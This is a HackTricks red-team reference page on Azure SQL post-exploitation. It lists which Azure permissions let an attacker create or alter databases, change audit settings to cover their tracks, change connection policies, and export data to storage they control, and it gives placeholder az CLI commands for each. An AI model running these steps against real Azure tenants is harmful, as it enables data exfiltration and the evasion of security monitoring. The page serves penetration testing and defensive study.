Az - SQL Post Exploitation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

SQL Database Post Exploitation

For more information about SQL Database check:

https://github.com/HackTricks-wiki/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-services/az-sql-database.md

"Microsoft.Sql/servers/databases/read", "Microsoft.Sql/servers/read" && "Microsoft.Sql/servers/databases/write"

With these permissions, an attacker can create and update databases within the compromised environment. This post-exploitation activity could allow an attacker to add malicious data, modify database configurations, or insert backdoors for further persistence, potentially disrupting operations or enabling additional malicious actions.

# Create Database
az sql db create --resource-group <resource-group> --server <server-name> --name <new-database-name>

# Update Database
az sql db update --resource-group <resource-group> --server <server-name> --name <database-name> --max-size <max-size-in-bytes>

"Microsoft.Sql/servers/elasticPools/write" && "Microsoft.Sql/servers/elasticPools/read"

With these permissions, an attacker can create and update elasticPools within the compromised environment. This post-exploitation activity could allow an attacker to add malicious data, modify database configurations, or insert backdoors for further persistence, potentially disrupting operations or enabling additional malicious actions.

# Create Elastic Pool
az sql elastic-pool create \
    --name <new-elastic-pool-name> \
    --server <server-name> \
    --resource-group <resource-group> \
    --edition <edition> \
    --dtu <dtu-value>

# Update Elastic Pool
az sql elastic-pool update \
    --name <elastic-pool-name> \
    --server <server-name> \
    --resource-group <resource-group> \
    --dtu <new-dtu-value> \
    --tags <key=value>

"Microsoft.Sql/servers/auditingSettings/read" && "Microsoft.Sql/servers/auditingSettings/write"

With this permission, you can modify or enable auditing settings on an Azure SQL Server. This could allow an attacker or authorized user to manipulate audit configurations, potentially covering tracks or redirecting audit logs to a location under their control. This can hinder security monitoring or enable it to keep track of the actions. NOTE: To enable auditing for an Azure SQL Server using Blob Storage, you must attach a storage account where the audit logs can be saved.

az sql server audit-policy update \
  --server <server_name> \
  --resource-group <resource_group_name> \
  --state Enabled \
  --storage-account <storage_account_name> \
  --retention-days 7

"Microsoft.Sql/locations/connectionPoliciesAzureAsyncOperation/read", "Microsoft.Sql/servers/connectionPolicies/read" && "Microsoft.Sql/servers/connectionPolicies/write"

With this permission, you can modify the connection policies of an Azure SQL Server. This capability can be exploited to enable or change server-level connection settings

az sql server connection-policy update \
  --server <server_name> \
  --resource-group <resource_group_name> \
  --connection-type <Proxy|Redirect|Default>

"Microsoft.Sql/servers/databases/export/action"

With this permission, you can export a database from an Azure SQL Server to a storage account. An attacker or authorized user with this permission can exfiltrate sensitive data from the database by exporting it to a location they control, posing a significant data breach risk. It is important to know the storage key to be able to perform this.

az sql db export \
  --server <server_name> \
  --resource-group <resource_group_name> \
  --name <database_name> \
  --storage-uri <storage_blob_uri> \
  --storage-key-type SharedAccessKey \
  --admin-user <admin_username> \
  --admin-password <admin_password>

"Microsoft.Sql/servers/databases/import/action"

With this permission, you can import a database into an Azure SQL Server. An attacker or authorized user with this permission can potentially upload malicious or manipulated databases. This can lead to gaining control over sensitive data or by embedding harmful scripts or triggers within the imported database. Additionaly you can import it to your own server in azure. Note: The server must allow Azure services and resources to access the server.

az sql db import --admin-user <admin-user> \
--admin-password <admin-password> \
--name <target-database-name> \
--server <azure-sql-server-name> \
--resource-group <resource-group-name> \
--storage-key-type SharedAccessKey \
--storage-key <storage-account-key> \
--storage-uri "https://<storage-account-name>.blob.core.windows.net/bacpac-container/MyDatabase.bacpac"

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAz - Table Storage Post Exploitation NextAz - VMs & Network Post Exploitation

Last updated 16 hours ago